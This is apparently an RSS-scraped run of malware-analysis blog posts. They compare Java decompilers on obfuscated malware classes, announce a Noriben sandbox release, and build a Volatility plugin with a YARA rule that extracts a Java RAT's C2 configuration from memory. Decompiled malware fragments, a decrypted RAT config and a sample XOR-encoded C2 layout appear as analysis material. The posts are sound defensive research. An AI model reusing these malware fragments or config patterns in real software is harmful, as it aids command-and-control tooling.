Here we see similar results as to what other tools found. But, as mentioned earlier, the exception handling is very confusing. There are breaks and exceptions inline with functional code. Later conditional sections, such as ensuring that the system is running on Microsoft Windows, are ignored and the code is shown as one series of instructions. All-in-all, it does give us some of the source code in a somewhat reasonable facsimile of the original. Excellent as a back-up tool if others fail, I wouldn't rely upon it for my analysis.

What about FernFlower?

FernFlower was a well known and trusted decompiler years ago. Like most decompilers, it fell off the scene silently. The first version was web-based, requiring you to upload your class files for analysis. Later versions were compiled. The FernFlower engine is currently used as the backend for commercial (shareware) products of DJ Decompiler and AndroChef. While competent tools that have built upon the capabilities of FernFlower, they are generally just commercial GUIs for the tool.

Additionally, FernFlower alone failed horribly in all of the tests here. Astonishingly, when confronted with the raw class file, it was unable to decompile or disassemble the main HOSTS writing function. However, it did decompile ZKM's string decryption routine, the exact opposite of what we need:


publicclassecextendsu{

privatestaticfinalString[]z;

publicvoidb(Stringparam1){
// $FF: Couldn't be decompiled
}

static{
String[]var10000=newString[5];
String[]var10001=var10000;
bytevar10002=0;
Stringvar10003="_8>f 1)4\" t},k u2,q";
bytevar10004=-1;

while(true){
char[]var5;
label38:{
char[]var2=var10003.toCharArray();
intvar10006=var2.length;
intvar0=0;
var5=var2;
intvar6=var10006;
if(var10006>1){
var5=var2;
var6=var10006;
if(var10006<=var0){
breaklabel38;
}
}

do{
char[]var8=var5;
intvar10007=var0;

while(true){
charvar10008=var8[var10007];
bytevar10009;
switch(var0%5){
case0:
var10009=17;
break;
case1:
var10009=93;
break;
case2:
var10009=91;
break;
case3:
var10009=2;
break;
default:
var10009=116;
}

var8[var10007]=(char)(var10008^var10009);
++var0;
if(var6!=0){
break;
}

var10007=var6;
var8=var5;
}
}while(var6>var0);
}

Stringvar4=(newString(var5)).intern();
switch(var10004){
case0:
var10001[var10002]=var4;
var10001=var10000;
var10002=2;
var10003="M\n2l ~*(^\'h./g \"o f x+>p M8/a(y2(v ";
var10004=1;
break;
case1:
var10001[var10002]=var4;
var10001=var10000;
var10002=3;
var10003="T \t8T";
var10004=2;
break;
case2:
var10001[var10002]=var4;
var10001=var10000;
var10002=4;
var10003="B$(v | )k t";
var10004=3;
break;
case3:
var10001[var10002]=var4;
z=var10000;
return;
default:
var10001[var10002]=var4;
var10001=var10000;
var10002=1;
var10003="Y \bV5_ \f";
var10004=0;
}
}
}
}


Test 2

The second test is against a very basic class file that performs one overall function, to delete a passed filename. One notable feature about this class file is that it contains no string table. That is one less layer to work around, but it still gave some issues.

JD-GUI (raw class file  /  JDO Deobfuscated  /  JMD Deobfuscated)

publicclassccextendsu
{
// ERROR //
publicvoidb(java.lang.StringparamString)
{
// Byte code:
// 0: getstatic 76 c:db I
// 3: istore 5
// 5: invokestatic 13 s:b ()Ljava/lang/String;
// 8: astore_2
// 9: invokestatic 13 s:b ()Ljava/lang/String;
// 12: astore_3
// 13: new 6 java/io/File
// 16: dup
// 17: new 8 java/lang/StringBuilder
... Reduced for brevity ...
// 93: athrow
// 94: aload 4// 96: getstatic 9 s:h Ljava/io/DataInputStream;// 99: aconst_null// 100: invokestatic 11 g:e ()[B// 103: invokestatic 12 p:b (Ljava/io/File;Ljava/io/DataInputStream;Lq;[B)V// 106: return//// Exception table:// from to target type// 46 59 62 re// 53 70 73 re// 63 80 83 re// 74 90 93 re}}

The first run of JD-GUI against this file produced identical results regardless of if a deobfuscator was used. That leads to the assumption that core obfuscation used by this malware is to simply rename functions and encode strings. However, it failed to decompile the code in any way, providing just basic disassembled code.

Procyon (raw class file  /  JDO Deobfuscated  /  JMD Deobfuscated)

importjava.io.*;

publicclassccextendsu
{
publicvoidb(finalStrings){
finalintdb=c.db;
finalStringb=s.b();
finalStringb2=s.b();
finalFilefile=newFile(b+File.separator+b2);
Filefile3=null;
Label_0096:{
Label_0094:{
try{
finalFilefile2=file3=file;
if(db!=0){
breakLabel_0096;
}
if(!file2.exists()){
breakLabel_0094;
}
}
catch(rere){
throwre;
}
finalFilefile4;
try{
file4=(file3=file);
if(db!=0){
breakLabel_0096;
}
}
catch(rere2){
throwre2;
}
try{
if(!file4.isFile()){
breakLabel_0094;
}
}
catch(rere3){
throwre3;
}
try{
file.delete();
}
catch(rere4){
throwre4;
}
}

file3=file;
}

p.b(file3,s.h,null,g.e());
}
}

Procyon provides ideal output. It shows the various exception catching taking place to ensure that the file exists, and is a file (not a folder or device), before calling for the deletion of it. The only issue is that the file object is copied into three other objects (file2, file3, file4) for exception catching purposes. Realistically, these would likely all be the same object.


JAD (raw class file  /  JDO Deobfuscated  /  JMD Deobfuscated)


importjava.io.File;

publicclassccextendsu
{

publiccc()
{
}

publicvoidb(Strings1)
{
Filefile;
inti;
i=c.db;
Strings2=s.b();
Strings3=s.b();
file=newFile((newStringBuilder(String.valueOf(s2))).append(File.separator).append(s3).toString());
file;
if(i!=0)goto_L2;elsegoto_L1
_L1:
exists();
JVMINSTRifeq94;
goto_L3_L4
throw;
_L3:
file;
if(i!=0)goto_L2;elsegoto_L5
throw;
_L5:
isFile();
JVMINSTRifeq94;
goto_L6_L4
throw;
_L6:
file.delete();
goto_L4
throw;
_L4:
file;
_L2:
s.h;
null;
g.e();
p.b();
}
}

Here, JAD slightly disappoints. It was unable to create decompiled code from the point of the first exception catch. Instead, it reverts to a mix of disassembled Java code and decompiled code. However, the class is still simple enough to understand the functionality from this view, though it's nowhere near as useable as Procyon.


What about Krakatau?
Krakatau was mentioned earlier, but not shown here. In my experience, Krakatau provides one of the best decompilation outputs, and is able to reverse a larger array of unusual code. In fact, for the first test, it is able to produce valid code for both the obfuscated routine and the string encoder. It is definitely notable of mention and use. However, I also had many issues with it working correctly. It would crash on most samples I gave it, though it would produce decompiled results. Most of this is due to minor issues: hardcoded checks for a file extension of ".jar", a Java path of JAVA_HOME\jre\lib\rt.jar, instead of the seen "jre7", etc. It may require small adjustments and an analytic eye to work cleanly in its current state, but it is definitely shaping up to become one of the better decompilers.

reJ (raw class file)

I can't just bring up reJ and not discuss it more in depth. reJ is my favorite Java tool for code manipulation, giving you a great deal of power over the code in its compiled form. It is a Java-based disassembler and hex editor for compiled Java class files. It provides granular inspection of the byte codes, string tables, and hardcoded values. It also allows for the direct editing, deletion, and addition of new byte code. It is only a disassembler, though, so its use requires extra knowledge of Java bytecode.

For a better analysis, I'd recommend toggling/enabling the following:
  • View -> Reference Translation -> Hybrid
  • View -> Split Mode -> Hex View
  • View -> Constant Pool

With some practice, you can work some magic with obfuscated Java code with reJ. By inserting print statements you could have the program display all of its decoded/operational values during run time. However, this does require that you manually manage the stack pointers, which is not for the faint of reversing.


Closing Statements

The one takeaway from all of this is that there is, still, no clear-cut best decompiler. Up until this year, it was a losing battle of abandoned products against ever-changing obfuscators and Java implementations. The recent introduction of Procyon, CFP, Krakatau has introduced much-needed new blood into the field. While their results are still not perfect, the hope is that within the next year or two they should surpass JD-GUI and JAD.

For now, though, analysis still requires that a reverser run multiple decompilers against their sample to determine the actual functionality. My current flow has always been to run JD-GUI first, then JAD. However, I've been swayed towards Procyon, accompanied by its new GUIs, to easily churn through hundreds of classes and JAR files, making it my current first-run analysis tool. Krakatau is also included, but it's not yet a tool I would give to a junior analyst.

I'm very excited to see what will come about with these products next year when they've had a chance to mature.



Noriben version 1.4 released

$
0
0
It's been a few months since the last official release of Noriben. The interim time has been filled with a few ninja-edits of updated filters, and wondering what to put in next.

Noriben started out as a simple wrapper to Sysinternals procmon to automatically gather all of the runtime details for malware analysis within a VM. It then filters out all the unnecessary system details until what's left is a fairly concise view of what the malware did to the system while running. It is a great alternative to a dedicated sandbox environment. More details on Noriben can be found here.

Over the months I was ecstatic to hear of organizations using Noriben in various roles. Many had modified the script to use it as an automated sandbox to run alongside their commercial products, which was exactly one of my goals for the script. However, the current requirement of manual interaction was an issue and I saw many ugly hacks of how people bypassed it. The new version should take care of that issue.
This was originally a release for version 1.3, which I pushed up on Friday. However, I received quite a bit of feedback for other new features and so quickly I pushed up version 1.4.

In the new version 1.4, I've introduced a few new features:

  • A non-interactive mode that runs for a specified number of seconds on malware that is specified from the command line
  • The ability to generalize strings, using Windows environment variables
  • The ability to specify an output directory
Non-Interactive Mode
The non-interactive mode was needed for a long time, and I apologize it took some time to implement it, as it was a very easy addition. It can be set in one of two ways:
The beginning of the source has a new line:

timeout_seconds = 0

By setting this to a value other than zero, Noriben will automatically wait that number of seconds to monitor the file system. This can be hardcoded for automated implementations, such as in a sandbox environment.

This value can also be overridden with a command line option of --timeout (-t). When using this argument, Noriben will enable the timeout mode and use the specified number of seconds. This is useful if you have a particularly long runtime sample. Even if Noriben.py was modified to have a 120-second timeout, you can override this on the command line with a much greater value (3600 seconds, for example).

Noriben now also lets you note the malware from the command line, making it completely non-interactive:

Noriben.py --cmd "C:\malware\bad.exe www.badhost.com 80" --timeout 300

This command line will launch bad.exe, with a given command line, for a period of 5 minutes. At such time, Noriben will stop monitoring the malware, but it will continue to run.

Output Directory
An alternate output directory can be specified on the command line with --output. If this folder does not exist, it will be created. If Noriben is unable to create the directory, such as when it doesn't have access (e.g. C:\Windows\System32\), then it will give an error and quit.


String Generalization
One requested feature was to replace the file system paths with the Windows environment variables, to make them generic. Many people copy and paste their Noriben results which may show system-specific values, such as "C:\Documents and Settings\Bob\malware.exe". This string will be generalized to "%UserProfile%\malware.exe".

This feature is turned off by default, but can be enabled by changing a setting in the file:

generalize_paths = False

Or by setting --generalize on the command line.


All in all, these features could be summed up with:

Noriben.py --output C:\Logs\Malware --timeout 300 --generalize --cmd "C:\Malware\evil.exe"

Download Noriben

Dumping Malware Configuration Data from Memory with Volatility

$
0
0


When I first start delving in memory forensics, years ago, we relied upon controlled operating system crashes (to create memory crash dumps) or the old FireWire exploit with a special laptop. Later, software-based tools like regular dd, and win32dd, made the job much easier (and more entertaining as we watched the feuds between mdd and win32dd).

In the early days, our analysis was basically performed with a hex editor. By collecting volatile data from an infected system, we'd attempt to map memory locations manually to known processes, an extremely frustrating and error-prone procedure. Even with the advent of graphical tools such as HBGary Responder Pro, which comes with a hefty price tag, I've found most of my time spent viewing raw memory dumps in WinHex.

The industry has slowly changed as tools like Volatility have gained maturity and become more feature-rich. Volatility is a free and open-source memory analysis tool that takes the hard work out of mapping and correlating raw data to actual processes. At first I shunned Volatility for it's sheer amount of command line memorization, where each query required memorizing a specialized command line. Over the years, I've come to appreciate this aspect and the flexibility it provides to an examiner.

It's with Volatility that I focus the content for this blog post, to dump malware configurations from memory.

For those unfamiliar with the concept, it's rare to find static malware. That is, malware that has a plain-text URL in its .rdata section mixed in with other strings. Modern malware tends to be more dynamic, allowing for configurations to be downloaded upon infection, or be strategically injected into the executable by its author. Crimeware malware (Carberp, Zeus) tend to favor the former, connecting to a hardcoded IP address or domain to download a detailed configuration profile (often in XML) that is used to determine how the malware is to operate. What domains does it beacon to, on which ports, and with what campaign IDs - these are the items we determine from malware configurations.

Other malware rely upon a known block of configuration data within the executable, sometimes found within .rdata or simply in the overlay (the data after the end of the actual executable). Sometimes this data is in plain text, often it's encoded or encrypted. A notable example of this is in Mandiant's APT1 report on TARSIP-MOON, where a block of encrypted data is stored in the overlay. The point of this implementation is that an author can compile their malware, and then add in the appropriate configuration data after the fact.

As a method to improving the timeliness of malware analysis, I've been advocating for greater research and implementation of configuration dumpers. By identifying where data is stored within the file, and by knowing its encryption routine, one could simply write a script to extract the data, decrypt it, and print it out. Without even running the malware we know its intended C2 communications and have immediate signatures that we can then implement into our network defenses.

While this data may appear as a simple structure in plaintext in a sample, often it's encoded or encrypted via a myriad of techniques. Often this may be a form of encryption that we, or our team, deemed as too difficult to decrypt in a reasonable time. This is pretty common, advanced encryption or compression can often take weeks to completely unravel and is often left for when there's downtime in operations.

What do we do, then? Easy, go for the memory.

We know that the malware has a decryption routine that intakes this data and produces decrypted output. By simply running the malware and analyzing its memory footprint, we will often find the decrypted results in plaintext, as it has already been decrypted and in use by the malware.

Why break the encryption when we can let the malware just decrypt it for us?



For example, the awesome people at Malware.lu released a static configuration dumper for a known Java-based RAT. This dumper, available here on their GitHub repo, extracts the encryption key and configuration data from the malware's Java ZIP and decrypts it. It uses Triple DES (TDEA), but once that routine became public knowledge, the author quickly switched to a new routine. The author has then continued switching encryption routines regularly to avoid easy decryption. Based on earlier analysis, we know that the data is decrypted as:

Offset      0  1  2  3  4  5  6  7   8  9 10 11 12 13 14 15

00000000   70 6F 72 74 3D 33 31 33  33 37 53 50 4C 49 54 01   port=31337SPLIT.
00000016   6F 73 3D 77 69 6E 20 6D  61 63 53 50 4C 49 54 01   os=win macSPLIT.
00000032   6D 70 6F 72 74 3D 2D 31  53 50 4C 49 54 03 03 03   mport=-1SPLIT...
00000048   70 65 72 6D 73 3D 2D 31  53 50 4C 49 54 03 03 03   perms=-1SPLIT...
00000064   65 72 72 6F 72 3D 74 72  75 65 53 50 4C 49 54 01   error=trueSPLIT.
00000080   72 65 63 6F 6E 73 65 63  3D 31 30 53 50 4C 49 54   reconsec=10SPLIT
00000096   10 10 10 10 10 10 10 10  10 10 10 10 10 10 10 10   ................
00000112   74 69 3D 66 61 6C 73 65  53 50 4C 49 54 03 03 03   ti=falseSPLIT...
00000128   69 70 3D 77 77 77 2E 6D  61 6C 77 61 72 65 2E 63   ip=www.malware.c
00000144   6F 6D 53 50 4C 49 54 09  09 09 09 09 09 09 09 09   omSPLIT.........
00000160   70 61 73 73 3D 70 61 73  73 77 6F 72 64 53 50 4C   pass=passwordSPL
00000176   49 54 0E 0E 0E 0E 0E 0E  0E 0E 0E 0E 0E 0E 0E 0E   IT..............
00000192   69 64 3D 43 41 4D 50 41  49 47 4E 53 50 4C 49 54   id=CAMPAIGNSPLIT
00000208   10 10 10 10 10 10 10 10  10 10 10 10 10 10 10 10   ................
00000224   6D 75 74 65 78 3D 66 61  6C 73 65 53 50 4C 49 54   mutex=falseSPLIT
00000240   10 10 10 10 10 10 10 10  10 10 10 10 10 10 10 10   ................
00000256   74 6F 6D 73 3D 2D 31 53  50 4C 49 54 04 04 04 04   toms=-1SPLIT....
00000272   70 65 72 3D 66 61 6C 73  65 53 50 4C 49 54 02 02   per=falseSPLIT..
00000288   6E 61 6D 65 3D 53 50 4C  49 54 06 06 06 06 06 06   name=SPLIT......
00000304   74 69 6D 65 6F 75 74 3D  66 61 6C 73 65 53 50 4C   timeout=falseSPL
00000320   49 54 0E 0E 0E 0E 0E 0E  0E 0E 0E 0E 0E 0E 0E 0E   IT..............
00000336   64 65 62 75 67 6D 73 67  3D 74 72 75 65 53 50 4C   debugmsg=trueSPL
00000352   49 54 0E 0E 0E 0E 0E 0E  0E 0E 0E 0E 0E 0E 0E 0E   IT..............

Or, even if we couldn't decrypt this, we know that it's beaconing to a very unique domain name and port which can be searched upon. Either way, we now have a sample where we can't easily get to this decrypted information. So, let's solve that.

By running the malware within a VM, we should have a logical file for the memory space. In VMWare, this is a .VMEM file (or .VMSS for snapshot memory). In VirtualBox, it's a .SAV file. After running our malware, we suspend the guest operating system and then focus our attention on the memory file.

The best way to start is to simply grep the file (from the command line or a hex editor) for the unique C2 domains or artifacts. This should get us into the general vicinity of the configuration and show us the structure of it:

E:\VMs\WinXP_Malware>grep "www.malware.com" *
Binary file WinXP_Malware.vmem matches

With this known, we open the VMEM file and see a configuration that matches that of what we've previously seen. This tells us that the encryption routine changed, but not that of the configuration, which is common. This is where we bring out Volatility.

Searching Memory with Volatility


We know that the configuration data begins with the text of "port=<number>SPLIT", where "SPLIT" is used to delimit each field. This can then be used to create a YARA rule of:

rule javarat_conf {
    strings: $a = /port=[0-9]{1,5}SPLIT/ 
    condition: $a
}

This YARA rule uses the regular expression structure (defined with forward slashes around the text) to search for "port=" followed by a number that is 1 - 5 characters long. This rule will be used to get us to the beginning of the configuration data. If there is no good way to get to the beginning, but only later in the data, that's fine. Just note that offset variance between where the data should start and where the YARA rule puts us.

Let's test this rule with Volatility first, to ensure that it works:

E:\Development\volatility>vol.py -f E:\VMs\WinXP_Malware\WinXP_Malware.vmem yarascan -Y "/port=[0-9]{1,5}SPLIT/"
Volatile Systems Volatility Framework 2.3_beta
Rule: r1
Owner: Process VMwareUser.exe Pid 1668
0x017b239b  70 6f 72 74 3d 33 31 33 33 37 53 50 4c 49 54 2e   port=31337SPLIT.
0x017b23ab  0a 30 30 30 30 30 30 31 36 20 20 20 36 46 20 37   .00000016...6F.7
0x017b23bb  33 20 33 44 20 37 37 20 36 39 20 36 45 20 32 30   3.3D.77.69.6E.20
0x017b23cb  20 36 44 20 20 36 31 20 36 33 20 35 33 20 35 30   .6D..61.63.53.50
Rule: r1
Owner: Process javaw.exe Pid 572
0x2ab9a7f4  70 6f 72 74 3d 33 31 33 33 37 53 50 4c 49 54 01   port=31337SPLIT.
0x2ab9a804  6f 73 3d 77 69 6e 20 6d 61 63 53 50 4c 49 54 01   os=win.macSPLIT.
0x2ab9a814  6d 70 6f 72 74 3d 2d 31 53 50 4c 49 54 03 03 03   mport=-1SPLIT...
0x2ab9a824  70 65 72 6d 73 3d 2d 31 53 50 4c 49 54 03 03 03   perms=-1SPLIT...

One interesting side effect to working within a VM is that some data may appear under the space of VMWareUser.exe. The data is showing up somewhere outside of the context of our configuration. We could try to change our rule, but the simpler solution within the plugin is to just rule out hits from VMWareUser.exe and only allow hits from executables that contain "java".

Now that we have a rule, how do we automate this? By writing a quick and dirty plugin for Volatility.

Creating a Plugin


A quick plugin that I'm demonstrating is composed of two primary components: a YARA rule, and a configuration dumper. The configuration dumper scans memory for the YARA rule, reads memory, and displays the parsed results. An entire post could be written on just this file format, so instead I'll post a very generic plugin and highlight what should be modified. I wrote this based on the two existing malware dumpers already released with Volatility: Zeus and Poison Ivy.

Jamie Levy and Michael Ligh, both core developers on Volatility, provided some critical input on ways to improve and clean up the code.


# JavaRAT detection and analysis for Volatility - v 1.0
# This version is limited to JavaRAT's clients 3.0 and 3.1, and maybe others
# Author: Brian Baskin <brian@thebaskins.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or (at
# your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA

importvolatility.plugins.taskmodsastaskmods
importvolatility.win32.tasksastasks
importvolatility.utilsasutils
importvolatility.debugasdebug
importvolatility.plugins.malware.malfindasmalfind
importvolatility.confasconf
importstring

try:
importyara
has_yara=True
exceptImportError:
has_yara=False


signatures = {
'javarat_conf' : 'rule javarat_conf {strings: $a = /port=[0-9]{1,5}SPLIT/ condition: $a}'
}


config=conf.ConfObject()
config.add_option('CONFSIZE',short_option='C',default=256,
help='Config data size',
action='store',type='int')
config.add_option('YARAOFFSET',short_option='Y',default=0,
help='YARA start offset',
action='store',type='int')

classJavaRATScan(taskmods.PSList):
""" Extract JavaRAT Configuration from Java processes """

defget_vad_base(self,task,address):
forvadintask.VadRoot.traverse():
ifaddress>=vad.Startandaddress<vad.End:
returnvad.Start
returnNone

defcalculate(self):
""" Required: Runs YARA search to find hits """
ifnothas_yara:
debug.error('Yara must be installed for this plugin')

addr_space=utils.load_as(self._config)
rules=yara.compile(sources=signatures)
fortaskinself.filter_tasks(tasks.pslist(addr_space)):
if 'vmwareuser.exe' == task.ImageFileName.lower():
continue
if not 'java' in task.ImageFileName.lower():
continue
scanner=malfind.VadYaraScanner(task=task,rules=rules)
forhit,addressinscanner.scan():
vad_base_addr=self.get_vad_base(task,address)
yieldtask,address

def make_printable(self, input):
""" Optional: Remove non-printable chars from a string """
input = input.replace('\x09', '') # string.printable doesn't remove backspaces
return ''.join(filter(lambda x: x in string.printable, input))

def parse_structure(self, data):
""" Optional: Parses the data into a list of values """
struct = []
items = data.split('SPLIT')
for i in range(len(items) - 1): # Iterate this way to ignore any slack data behind last 'SPLIT'
item = self.make_printable(items[i])
field, value = item.split('=')
struct.append('%s: %s' % (field, value))
return struct


defrender_text(self,outfd,data):
""" Required: Parse data and display """
delim='-='*39+'-'
rules=yara.compile(sources=signatures)
outfd.write('YARA rule: {0}\n'.format(signatures))
outfd.write('YARA offset: {0}\n'.format(self._config.YARAOFFSET))
outfd.write('Configuration size: {0}\n'.format(self._config.CONFSIZE))
fortask,addressindata:# iterate the yield values from calculate()
outfd.write('{0}\n'.format(delim))
outfd.write('Process: {0} ({1})\n\n'.format(task.ImageFileName,task.UniqueProcessId))
proc_addr_space=task.get_process_address_space()
conf_data=proc_addr_space.read(address+self._config.YARAOFFSET,self._config.CONFSIZE)
config=self.parse_structure(conf_data)
foriinconfig:
outfd.write('\t{0}\n'.format(i))

This code is also available on my GitHub.

In a nutshell, you first have a signature to key on for the configuration data. This is a fully qualified YARA signature, seen as:

signatures = {
    'javarat_conf' : 'rule javarat_conf {strings: $a = /port=[0-9]{1,5}SPLIT/ condition: $a}'
}

This rule is stored in a Python dictionary format of 'rule_name' : 'rule contents'.

The plugin allows a command line argument (-Y) to set the the YARA offset. If your YARA signature hits 80 bytes past the beginning of the structure, then set this value to -80, and vice versa. This can also be hardcoded by changing the default value.

There a second command line argument (-C) to set the size of data to read for parsing. This can also be hardcoded. This will vary based upon the malware; I've seen some multiple kilobytes in size.

Rename the Class value, seen here as JavaRATScan, to whatever fits for your malware. It has to be a unique name. Additionally, the """""" comment block below the class name contains the description which will be displayed on the command line.

I do have an optional rule to limit the search to a certain subset of processes. In this case, only processes that contain the word "java" - this is a Java-based RAT, after all. It also skips any process of "VMWareUser.exe".

The plugin contains a parse_structure routine that is fed a block of data. It then parses it into a list of items that are returned and printed to the screen (or file, or whatever output is desired). This will ultimately be unique to each malware, and the optional function of make_printable() is one I made to clean up the non-printable characters from the output, allowing me to extending the blocked keyspace.

Running the Plugin


As a rule, I place all of my Volatility plugins into their own unique directory. I then reference this upon runtime, so that my files are cleanly segregated. This is performed via the --plugins option in Volatility:

E:\Development\volatility>vol.py --plugins=..\Volatility_Plugins

After specifying a valid plugins folder, run vol.py with the -h option to ensure that your new scanner appears in the listing:

E:\Development\volatility>vol.py --plugins=..\Volatility_Plugins -h
Volatile Systems Volatility Framework 2.3_beta
Usage: Volatility - A memory forensics analysis platform.

Options:
...

        Supported Plugin Commands:

                apihooks        Detect API hooks in process and kernel memory
...
                javaratscan  Extract JavaRAT Configuration from Java processes
...

The names are automatically populated based upon your class names. The text description is automatically pulled from the "docstring", which is the comment that directly follows the class name in the plugin. 

With these in place, run your scanner and cross your fingers:


For future use, I'd recommend prepending your plugin name with a unique identifier to make it stand out, like "SOC_JavaRATScan". Prepending with a "zz_" would make the new plugins appear at the bottom of Volality's help screen. Regardless, it'll help group the built-in plugins apart from your custom ones.

The Next Challenge: Data Structures


The greater challenge is when data is read from within the executable into a data structure in memory. While the data may have a concise and structured form when stored in the file, it may be transformed into a more complex and unwieldy format once read into memory by the malware. Some samples may decrypt the data in-place, then load it into a structure. Others decrypt it on-the-fly so that it is only visible after loading into a structure.

For example, take the following fictitious C2 data stored in the overlay of an executable:

Offset      0  1  2  3  4  5  6  7   8  9 10 11 12 13 14 15

00000000   08 A2 A0 AC B1 A0 A8 A6  AF 17 89 95 95 91 DB CE   .¢ ¬± ¨¦¯.‰••‘ÛÎ
00000016   CE 96 96 96 CF 84 97 88  8D 92 88 95 84 CF 82 8E   Ζ––Ï„—ˆ’ˆ•„Ï‚Ž
00000032   8C 03 D5 D5 D2 08 B1 A0  B2 B2 B6 AE B3 A5 05 84   Œ.ÕÕÒ.± ²²¶®³¥.„
00000048   99 95 93 80                                        ™•“€

By reversing the malware, we determine that this composed of Pascal-strings XOR encoded by 0xE1. Pascal-string are length prefixed, so applying the correct decoding would result in:

Offset      0  1  2  3  4  5  6  7   8  9 10 11 12 13 14 15

00000000   08 43 41 4D 50 41 49 47  4E 17 68 74 74 70 3A 2F   .CAMPAIGN.http:/
00000016   2F 77 77 77 2E 65 76 69  6C 73 69 74 65 2E 63 6F   /www.evilsite.co
00000032   6D 03 34 34 33 08 50 41  53 53 57 4F 52 44 05 65   m.443.PASSWORD.e
00000048   78 74 72 61                                        xtra

This is a very simple encoding routine, which I made with just:

items=['CAMPAIGN','http://www.evilsite.com','443','PASSWORD','extra']
data=''
foriinitems:
data+=chr(len(i))
forxini:data+=chr(ord(x)^0xE1)


Data structures are a subtle and difficult component of reverse engineering, and vary in complexity with the skill of the malware author. Unfortunately, data structures are some of the least shared indicators in the industry.

Once completed, a sample structure could appear similar to the following:

struct Configuration
{
    CHAR campaign_id[12];
    CHAR password[16];
    DWORD heartbeat_interval;
    CHAR C2_domain[48];
    DWORD C2_port;
}

With this structure, and the data shown above, the malware reads each variable in and applies it to the structure. But, we can already see some discrepancies: the items are in a differing order, and some are of a different type. While the C2 port is seen as a string, '443', in the file, it appears as a DWORD once read into memory. That means that we'll be searching for 0x01BB (or 0xBB01 based on endianness) instead of '443'. Additionally, there are other values introduced that did not exist statically within the file to contend with.

An additional challenge is that depending on how the memory was allocated, there could be slack data found within the data. This could be seen if the malware sample allocates memory malloc() without a memset(), or by not using calloc().

When read and applied to the structure, this data may appear as the following:

Offset      0  1  2  3  4  5  6  7   8  9 10 11 12 13 14 15

00000000   43 41 4D 50 41 49 47 4E  00 0C 0C 00 00 50 41 53   CAMPAIGN.....PAS
00000016   53 57 4F 52 44 00 00 00  00 00 00 00 00 00 17 70   SWORD..........p
00000032   68 74 74 70 3A 2F 2F 77  77 77 2E 65 76 69 6C 73   http://www.evils
00000048   69 74 65 2E 63 6F 6D 00  00 00 00 00 00 00 00 00   ite.com.........
00000064   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000080   00 00 01 BB                                        ...»

We can see from this that our strategy changes considerably when writing a configuration dumper. The dumper won't be written based upon the structure in the file, but instead upon the data structure in memory, after it has been converted and formatted. We'll have to change our parser slightly to account for this. For example, if you know that the Campaign ID is 12 bytes, then read 12 bytes of data and find the null terminator to pull the actual string.

This just scratches the surface of what you can do with encrypted data in memory, but I hope it can inspire others to use this template code to make quick and easy configuration dumpers to improve their malware analysis.

A GhettoForensics Look Back on 2013

$
0
0
This site, Ghetto Forensics, was started this year as the beginning of an effort to better document some of the side work that I do that I thought would be appealing, or humorous, to the overall industry. This content was originally posted to my personal web site, thebaskins.com, but really needed a site of its own.

My first public project this year was reversing, documenting, and writing a parser for Java IDX files, cached files that accompany any file downloaded via Java. It was a bit of a painful project, mainly due to the bad documentation provided by Oracle, not to mention the horrendous style in which they designed it. I immediately released the code to the public and have received great feedback for improvements, as well as quite a few examiners touting how much they used it in their examinations. Thank you!

However, my greatest project this year was the release of Noriben. I first designed Noriben as a simple script for me to use at home for really quick malware dynamic analysis. I lacked many of the tools and sandboxes that I use at my day job, and needed a quick triage tool for research. After a few months, I realized that many commercial groups were in the exact same situation as I was at home: a severe lack of funding to purchase software to help. So, I cleaned up the code, gave it a silly name, and released it into the world. I've received numerous feedback and suggestions from all over, all of which were incorporated into the code. While its usage is widely unknown, for practical reasons, I did learn of quite a few Defense organizations, as well as a handful of Fortune organizations that incorporated it into their workflow. Awesome!

Research-wise, I released a comparison of various Java disassembly and decompilation tools, having found the standard JD-GUI to be extremely lacking for modern Java malware. The positive side of this is introducing tools to security professionals that were previously unknown to them. The research itself changed the tools that I use on a regular basis and allowed me to create a better product, faster, for reversing Java applications.

For community projects, I wrote a small malware configuration dumper template for Volatility, based on some time-reducing work I've been practicing. Whenever I do a full reversal of malware, I now try to write a memory configuration dumper. That way, in a few months when they change the encryption routine, I can still retrieve the same configuration and getting the report out instantly, then go back and figure out the encryption.





My greatest effort, however, is in a series of plugins and parsers to the Plaso supertimeline suite. This awesome forensic tool, created by Kristinn Gudjonsson, is an evolution of log2timeline. While we've performed timeline-based forensics since the beginning of time, this unique tool parses data files to retrieves individual records within for additional events on the timeline. I started by first writing a parser for Java IDX files, based on my initial, stand-alone parser. I then wrote one for Windows scheduled task job files, then a plugin for bencoded (i.e. BitTorrent) files. A painful exercise, only in that through their stringent code review, I was forced to become a better programmer than I was. Through Kristinn's efforts I've been able to write much cleaner and efficient code, and can now attack parsers quickly. I find writing parsers for Plaso to provide a great sense of community involvement, and I recommend that others, who may be proficient at Python, contribute in their own capacity.

Changes to Forensic Work Processes


The biggest success so far this year in my file system forensics work has been in moving my dead box forensics to X-Ways Forensics. After working an exam that required X-Ways (due to XFS file systems), I quickly fell in love with just how fast and easily I can cut through systems. As X-Ways keeps track of every file already viewed (with a green highlight), large 20-system cases fell easily as duplicate files/folders could immediately be excluded based solely on that green color. No more 10-step program just to run searches, and no 30-minute waits to reparse the MFT after every time EnCase crashes. Not to mention that it can be quickly picked up without guidance, unlike other software that exists solely to drive a lucrative training business.

The necessity for change, and for a varied toolkit, is found in the wide ranges of media encountered. My past three exams contained file systems that were not able to be parsed by EnCase 6, including XFS and Ext4. Interestingly, support for XFS wasn't found in any other product, surprisingly not even Sleuthkit/Autopsy. When I spoke with Brian Carrier about this at the Open Source Digital Forensics Conference (OSDFC), the reasoning was that until there is an adequate demand for a file system parser, the work isn't performed. File systems require an extreme amount of effort for a relatively volatile market. This makes logical sense, as just a few years ago everyone was enthusiastic about ReiserFS... luckily the effort hadn't moved forward on that file system.

